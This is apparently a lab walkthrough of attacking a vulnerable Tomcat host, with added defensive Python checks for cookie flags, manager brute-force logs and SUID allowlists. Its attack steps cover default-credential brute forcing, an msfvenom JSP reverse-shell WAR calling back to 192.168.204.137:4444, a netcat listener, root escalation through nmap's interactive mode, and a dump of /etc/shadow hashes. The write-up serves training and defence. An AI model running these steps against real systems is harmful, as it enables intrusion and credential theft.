|_http-server-header: Apache-Coyote/1.1
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.204.136
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.204.136:8180/admin/
|     Form id: username
|_    Form action: j_security_check;jsessionid=42FA811BFEB53FD3B608B245C81FF812
| http-enum: 
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /admin/login.html: Possible admin folder
|   /admin/admin.html: Possible admin folder
|   /admin/account.html: Possible admin folder
|   /admin/admin_login.html: Possible admin folder
|   /admin/home.html: Possible admin folder
|   /admin/admin-login.html: Possible admin folder
|   /admin/adminLogin.html: Possible admin folder
|   /admin/controlpanel.html: Possible admin folder
|   /admin/cp.html: Possible admin folder
|   /admin/index.jsp: Possible admin folder
|   /admin/login.jsp: Possible admin folder
|   /admin/admin.jsp: Possible admin folder
|   /admin/home.jsp: Possible admin folder
|   /admin/controlpanel.jsp: Possible admin folder
|   /admin/admin-login.jsp: Possible admin folder
|   /admin/cp.jsp: Possible admin folder
|   /admin/account.jsp: Possible admin folder
|   /admin/admin_login.jsp: Possible admin folder
|   /admin/adminLogin.jsp: Possible admin folder
|   /manager/html/upload: Apache Tomcat (401 Unauthorized)
|   /manager/html: Apache Tomcat (401 Unauthorized)
|   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
|   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
|   /admin/jscript/upload.html: Lizard Cart/Remote File upload
|_  /webdav/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:71:62:0D (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.69 seconds
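
Every /admin/ path in the scan above reports a JSESSIONID cookie set without the httponly flag, which is exactly what the http-cookie-flags script checks for. As an added example (not original to the walkthrough), the Python snippet below parses raw HTTP response headers and reports, per cookie, which of HttpOnly, Secure and SameSite are absent. Both responses are constructed: the first mirrors the scan finding (the session id value is the one in the scan output), the second shows the hardened header.

```python
from typing import Dict, List, Tuple

# Two constructed HTTP responses: the first mirrors the scan finding above
# (JSESSIONID with no HttpOnly), the second is the hardened form.
WEAK_RESPONSE = """\
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=42FA811BFEB53FD3B608B245C81FF812; Path=/admin
Content-Type: text/html;charset=ISO-8859-1
"""

HARDENED_RESPONSE = """\
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=42FA811BFEB53FD3B608B245C81FF812; Path=/admin; HttpOnly; Secure; SameSite=Strict
Content-Type: text/html;charset=ISO-8859-1
"""

# Attributes a session cookie should carry; attribute names are case-insensitive.
REQUIRED = ("HttpOnly", "Secure", "SameSite")


def check_set_cookie(value: str) -> Tuple[str, List[str]]:
    """Return (cookie name, list of required attributes that are absent)."""
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    present = {p.split("=", 1)[0].strip().lower() for p in parts[1:] if p}
    missing = [attr for attr in REQUIRED if attr.lower() not in present]
    return name, missing


def audit_cookies(raw_response: str) -> Dict[str, List[str]]:
    """Map each Set-Cookie header in a raw HTTP response to the flags it is missing."""
    report: Dict[str, List[str]] = {}
    for line in raw_response.splitlines():
        header, sep, value = line.partition(":")
        if sep and header.strip().lower() == "set-cookie":
            name, missing = check_set_cookie(value.strip())
            report[name] = missing
    return report


if __name__ == "__main__":
    print("weak    :", audit_cookies(WEAK_RESPONSE))
    print("hardened:", audit_cookies(HARDENED_RESPONSE))
```

On Tomcat the HttpOnly flag on JSESSIONID is controlled by the `useHttpOnly` attribute of the Context; the Secure flag only makes sense once the manager is served over TLS, which this host does not do on port 8180.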

If we browse to the site, we can view the Tomcat homepage. The Tomcat manager application (/manager/html) requires a username and password.

Metasploit has a brute-force module, auxiliary/scanner/http/tomcat_mgr_login, for guessing the manager credentials; it ships with wordlists of default Tomcat manager users and passwords.

msf6 > use auxiliary/scanner/http/tomcat_mgr_login 
msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                 Required  Description
   ----              ---------------                                 --------  -----------
   ANONYMOUS_LOGIN   false                                           yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                           no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none                                            no        Skip existing credentials stored in the current database (Accepted: none, user, user&r
                                                                               ealm)
   PASSWORD                                                          no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists  no        File containing passwords, one per line
                     /tomcat_mgr_default_pass.txt
   Proxies                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
                                                                               -metasploit.html
   RPORT             8080                                            yes       The target port (TCP)
   SSL               false                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                               yes       The number of concurrent threads (max one per host)
   USERNAME                                                          no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists  no        File containing users and passwords separated by space, one pair per line
                     /tomcat_mgr_default_userpass.txt
   USER_AS_PASS      false                                           no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists  no        File containing users, one per line
                     /tomcat_mgr_default_users.txt
   VERBOSE           true                                            yes       Whether to print output for all attempts
   VHOST                                                             no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOST 192.168.204.136
RHOST => 192.168.204.136
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > exploit

The module finds a working pair from the default-credentials wordlist. It is tomcat:tomcat.

[-] 192.168.204.136:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.204.136:8180 - Login Successful: tomcat:tomcat
[-] 192.168.204.136:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 192.168.204.136:8180 - LOGIN FAILED: both:manager (Incorrect)

With these credentials we can log in to the manager application.

The manager page includes a form for uploading and deploying WAR files. Create a payload with msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.204.137 LPORT=4444 -f war >ammar2.war

Upload the WAR file through the manager form.

Open a netcat listener on the port the payload was built with:

nc -nlvp 4444

Now browse to the deployed application's page.

And the listener receives a connection.
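
From the defender's side, both steps above (the password guessing against /manager/html and the WAR upload) leave a trail in Tomcat's access log. As an added example that is not part of the original walkthrough, this Python detector reads access-log lines in the common log format written by Tomcat's AccessLogValve and raises alerts for repeated 401 responses against the manager from one client, for a successful authenticated request that follows those failures, and for any POST to /manager/html/upload. The log lines are constructed for the example, and the five-failures-within-sixty-seconds threshold is an assumed tuning.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, List, Optional, Tuple

# Constructed Tomcat access-log lines (common log format) modelling the activity
# in this section: repeated 401s against the manager from one client, a login,
# then a WAR upload. A second client logs in without prior failures.
ACCESS_LOG = """\
192.168.204.137 - - [09/Jun/2024:00:30:01 -0400] "GET /manager/html HTTP/1.1" 401 1293
192.168.204.137 - - [09/Jun/2024:00:30:01 -0400] "GET /manager/html HTTP/1.1" 401 1293
192.168.204.137 - - [09/Jun/2024:00:30:02 -0400] "GET /manager/html HTTP/1.1" 401 1293
192.168.204.137 - - [09/Jun/2024:00:30:02 -0400] "GET /manager/html HTTP/1.1" 401 1293
192.168.204.137 - - [09/Jun/2024:00:30:03 -0400] "GET /manager/html HTTP/1.1" 401 1293
192.168.204.137 - tomcat [09/Jun/2024:00:30:03 -0400] "GET /manager/html HTTP/1.1" 200 9876
192.168.204.137 - tomcat [09/Jun/2024:00:31:10 -0400] "POST /manager/html/upload HTTP/1.1" 200 9976
192.168.204.50 - - [09/Jun/2024:00:35:00 -0400] "GET /admin/ HTTP/1.1" 200 1234
192.168.204.50 - admin [09/Jun/2024:00:36:00 -0400] "GET /manager/html HTTP/1.1" 200 9876
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

Alert = Tuple[str, str, str]  # (rule name, client ip, detail)


def parse_line(line: str) -> Optional[dict]:
    """Parse one common-log-format line; None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    return e


def detect(log_text: str, threshold: int = 5, window: int = 60) -> List[Alert]:
    """Scan manager-app requests and return alerts in the order they fire."""
    alerts: List[Alert] = []
    failures: Dict[str, Deque[datetime]] = defaultdict(deque)  # ip -> recent 401 timestamps
    flagged, notified = set(), set()
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None or not e["path"].startswith("/manager/"):
            continue
        ip, ts = e["ip"], e["ts"]
        if e["status"] == 401:
            q = failures[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window:  # drop failures outside the window
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("BRUTE_FORCE", ip, f"{len(q)} manager auth failures within {window}s"))
        elif e["status"] == 200:
            # A user name in the remote-user field means the request was authenticated.
            if e["user"] != "-" and ip in flagged and ip not in notified:
                notified.add(ip)
                alerts.append(("LOGIN_AFTER_FAILURES", ip, f"'{e['user']}' authenticated after repeated failures"))
            if e["method"] == "POST" and e["path"].startswith("/manager/html/upload"):
                alerts.append(("WAR_DEPLOY", ip, f"WAR uploaded through the manager as '{e['user']}'"))
    return alerts


if __name__ == "__main__":
    for rule, ip, detail in detect(ACCESS_LOG):
        print(f"[{rule}] {ip}: {detail}")
```

The WAR_DEPLOY rule fires unconditionally because a deployment through the manager is rare enough on most hosts that every one deserves a look; the other two rules are rate-based and should be tuned to the environment.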

Privilege Escalation with SUID Binaries

Find the binaries with the SUID bit set:

find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown

There are many binaries with the SUID bit set; this walkthrough uses nmap, because this old version (4.53) still has an interactive mode that can run shell commands with the binary's elevated privileges.

nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap>  !sh
id
uid=110(tomcat55) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)
cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::

The effective UID is now root (euid=0), which is why /etc/shadow is readable.
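
The listing above mixes SUID binaries that belong on any Debian-derived host with ones that should not carry the bit, nmap being the one used here. As an added example, not from the original page, this Python audit reproduces the find command and compares its result against an allowlist. The allowlist is a constructed baseline for this example (a real one should be taken from a freshly installed reference system of the same release, never from the host being audited), and the sample input is the page's own find output.

```python
import os
import stat
from typing import Dict, Iterable, List, Set

# Constructed baseline of SUID binaries expected on the target's release. This is
# an assumption for the example; build a real allowlist from a clean reference
# install of the same distribution, not from the host being audited.
EXPECTED_SUID: Set[str] = {
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/fusermount", "/bin/ping", "/bin/ping6",
    "/sbin/mount.nfs", "/lib/dhcp3-client/call-dhclient-script",
    "/usr/bin/sudo", "/usr/bin/sudoedit", "/usr/bin/passwd", "/usr/bin/gpasswd",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/newgrp", "/usr/bin/at",
    "/usr/bin/traceroute6.iputils", "/usr/bin/arping", "/usr/bin/mtr", "/usr/sbin/uuidd",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/pt_chown", "/usr/lib/eject/dmcrypt-get-device",
}

# The find output from this section, used as sample input (copied from above).
FIND_OUTPUT = """\
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown
"""


def find_suid(root: str = "/") -> List[str]:
    """Python equivalent of `find / -perm -u=s -type f`: regular files with the setuid bit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat so symlinks are not followed
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def audit_suid(paths: Iterable[str], baseline: Set[str] = EXPECTED_SUID) -> Dict[str, List[str]]:
    """Compare a SUID listing with the baseline. Extra entries are candidates for
    `chmod u-s` or package removal; missing ones may indicate a tampered install."""
    found = {p.strip() for p in paths if p.strip()}
    return {"unexpected": sorted(found - baseline), "missing": sorted(baseline - found)}


if __name__ == "__main__":
    import sys
    listing = find_suid(sys.argv[1]) if len(sys.argv) > 1 else FIND_OUTPUT.splitlines()
    report = audit_suid(listing)
    for path in report["unexpected"]:
        print("UNEXPECTED SUID:", path)
    for path in report["missing"]:
        print("MISSING SUID:", path)
```

Run without arguments it audits the page's listing and flags nmap along with the netkit r-tools, telnetlogin, suexec, pppd and X; with a root directory as argument it walks a live filesystem instead. On Debian-derived systems the durable fix is `dpkg-statoverride`, so a package upgrade does not restore the bit.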
